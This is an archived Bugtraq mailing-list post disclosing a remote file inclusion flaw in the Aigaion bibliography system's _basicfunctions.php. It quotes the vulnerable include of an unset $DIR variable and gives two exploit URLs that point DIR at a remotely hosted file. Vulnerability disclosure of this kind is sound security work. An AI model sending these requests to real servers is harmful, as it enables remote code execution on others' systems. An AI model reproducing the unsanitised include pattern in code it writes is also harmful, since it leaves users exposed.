Bugtraq mailing list archives
Web Interface remote file inclusion
From: navairum () gmail com
Date: 12 Nov 2006 00:45:24 -0000
Software:Web based bibliography management system Download link: http://sourceforge.net/projects/aigaion/ script:_basicfunctions.php author: navairum ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ The script _basicfunctions.php does not specify a value for the $DIR variable before including it. Vulnerable code: //if this script is not called from within one of the base pages, redirect to frontpage require_once($DIR."checkBase.php"); /* This function leads the browser to the given location */ ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Exploit: http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt? http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt? ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ peace
Current thread:
- Web Interface remote file inclusion navairum (Nov 13)